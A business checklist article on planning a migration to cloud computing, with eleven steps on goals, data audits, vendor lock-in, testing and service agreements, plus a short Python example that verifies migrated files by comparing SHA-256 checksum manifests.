Reference: http://www.bit.com.au/News/386990,5-security-basics-your-small-business-should-be-following.aspx?eid=59&edate=20140530&utm_source=20140530&utm_medium=newsletter&utm_campaign=daily_newsletter&nl=daily

Cloud computing business checklist: Easy migration

For many businesses, cloud computing can seem simple, yet it can cause massive IT headaches during a transition. You can’t just flip a switch to the cloud – you’ll need a migration plan that factors in provider services and security issues.

Here is a checklist to make your cloud computing migration easier:

  1. Align your business goals and processes with the cloud. It’s not enough to tack the cloud on to an existing IT strategy – and business leaders need to oversee the complete process. From IT security to final migration, make sure all hands are on deck.
  2. Know your SaaS from your IaaS. It’s important to distinguish between renting cloud space from an infrastructure-as-a-service provider and making a complete overhaul with a software-as-a-service provider.
  3. Audit your data for consistency and clarity. It doesn’t help to transfer outdated or corrupt data into the cloud – you’ll wind up with useless information taking up valuable space.
  4. Choose the applications that make sense for your business. Start with the extraneous and non-mission critical applications, and then gradually make your way to the essential data. Cloud computing migration is a process – don’t move everything all at once.
  5. Choose cloud providers that can scale with your existing IT setups. Vendor lock-in is a huge issue for businesses that have components from multiple providers. Unless you’re looking for a “rip-and-replace” overhaul of your IT infrastructure, you’ll want to find cloud providers that can play well with your legacy setup. You may want to keep certain applications local for security reasons, so factor that into your transition plan.
  6. Build your short and long-term transition plan. Which applications move first? Which ones need more fine tuning? Plot everything out with your cloud provider well before making the move.
  7. Open or closed-source? Enterprises have been wary of the public cloud in recent years, concerned by a perceived lack of security and sustainability. But the public cloud has improved dramatically since then, and many enterprises now partner with open-source cloud providers for cost-effective solutions.
  8. Test, then test again. Moving to the cloud is a huge procedural and economic step for businesses. Make sure you test for inefficiencies, and prepare to address privacy and security concerns during the move. Use non-critical data to test the capabilities of your new cloud setup.
  9. Identify the standards that govern cloud computing, and make sure your setup abides by them. This cloud standards wiki helps explain the various rules and regulations for cloud operations. Make sure your provider is aware of them and up to date.
  10. Read your Service Level Agreement (SLA) line-by-line. Make specific mention of the intellectual property rights surrounding your data. Who owns the data after the migration?
  11. Go live, keep testing, and ask for feedback. As with any technology rollout, there will be glitches.
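Several of the steps above (auditing your data, testing with non-critical data) boil down to verifying that what arrives in the cloud matches what left. One way to sketch that is a checksum manifest computed before and after migration; the helper names below are illustrative, not part of any provider's tooling:

```python
import hashlib
import tempfile
from pathlib import Path

def checksum_manifest(root: Path) -> dict:
    """Map each file's relative path to its SHA-256 digest, so the same
    manifest can be computed on-premises and again in the cloud copy."""
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }

def migration_intact(source: Path, migrated: Path) -> bool:
    """True only if both trees contain the same files with the same bytes."""
    return checksum_manifest(source) == checksum_manifest(migrated)

# Quick demonstration with two identical temporary trees
with tempfile.TemporaryDirectory() as src, tempfile.TemporaryDirectory() as dst:
    (Path(src) / "orders.csv").write_text("id,total\n1,9.99\n")
    (Path(dst) / "orders.csv").write_text("id,total\n1,9.99\n")
    print(migration_intact(Path(src), Path(dst)))  # True
```

Any mismatch in the two manifests pinpoints exactly which files were corrupted, truncated or dropped in transit, which is far more useful than a simple "it looks fine" spot check.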

Cloud computing has some key benefits for businesses, but not every provider or service delivers those benefits adequately. Keep this checklist handy to evaluate your company’s unique needs and ease the transition to the cloud.

Reference: http://techpageone.dell.com/technology/cloud-computing-business-checklist-easy-migration/#.UxfKjvmSxDC